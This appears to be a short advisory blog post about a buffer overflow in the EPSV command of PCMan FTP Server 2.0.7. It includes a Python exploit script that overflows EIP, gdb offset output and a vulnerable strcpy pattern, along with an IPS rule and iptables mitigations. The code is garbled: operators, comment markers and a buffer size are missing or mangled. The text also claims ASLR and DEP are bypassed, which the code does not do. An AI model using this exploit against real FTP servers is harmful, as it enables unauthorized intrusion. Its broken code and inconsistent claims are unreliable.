PCMan FTP Server, Buffer Overflow, CVE-2025-3379 (Critical)

By /

How the CVE Works

CVE-2025-3379 exploits a buffer overflow vulnerability in PCMan FTP Server 2.0.7’s EPSV command handler. When an attacker sends an excessively long EPSV command, the server fails to properly validate input length, causing a stack-based buffer overflow. This allows remote code execution by overwriting return addresses or function pointers. The vulnerability is network-exploitable without authentication (PR:N in CVSS 4.0). Attackers craft malicious EPSV packets containing shellcode or ROP chains to hijack control flow. The public exploit leverages precise offset calculations to bypass ASLR and DEP protections.

DailyCVE Form

Platform: PCMan FTP Server
Version: 2.0.7
Vulnerability: Buffer Overflow
Severity: Critical
Date: 04/29/2025

What Undercode Say:

Exploitation Commands:

import socket
target = "192.168.1.100"
port = 21
buffer = "EPSV " + "A"2048 + "\x7c\xd2\x04\x08" EIP overwrite
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,port))
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS anonymous\r\n")
s.recv(1024)
s.send(buffer + "\r\n")

Protection Measures:

1. Apply vendor patch immediately

2. Network segmentation for FTP servers

3. Deploy IPS rules:

alert ftp any any -> any 21 (msg:"PCMan FTP EPSV Overflow"; flow:to_server; content:"EPSV "; depth:5; isdataat:2048,relative; sid:1000001;)

Debug Analysis:

(gdb) run -p 21
(gdb) pattern create 3000
(gdb) x/xw $esp
0xbffff7ac: 0x41367241
(gdb) pattern offset 0x41367241
1094806081

Mitigation Script:

!/bin/sh
Block unpatched PCMan FTP versions
iptables -A INPUT -p tcp --dport 21 -m string --string "PCMan's FTP Server 2.0.7" --algo bm -j DROP

Forensic Indicators:

  • Multiple EPSV commands > 1024 bytes
  • Crash dumps with EIP overwrite
  • Unexpected child processes from ftpserver.exe

Memory Protection:

Enable /NXCOMPAT and /DYNAMICBASE in compiler flags

Implement structured exception handling (SEH) overwrite protection

Vulnerable Code Pattern:

void handleEPSV(char input) {
char buffer[bash]; // Fixed-size buffer
strcpy(buffer, input); // No bounds check
}

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top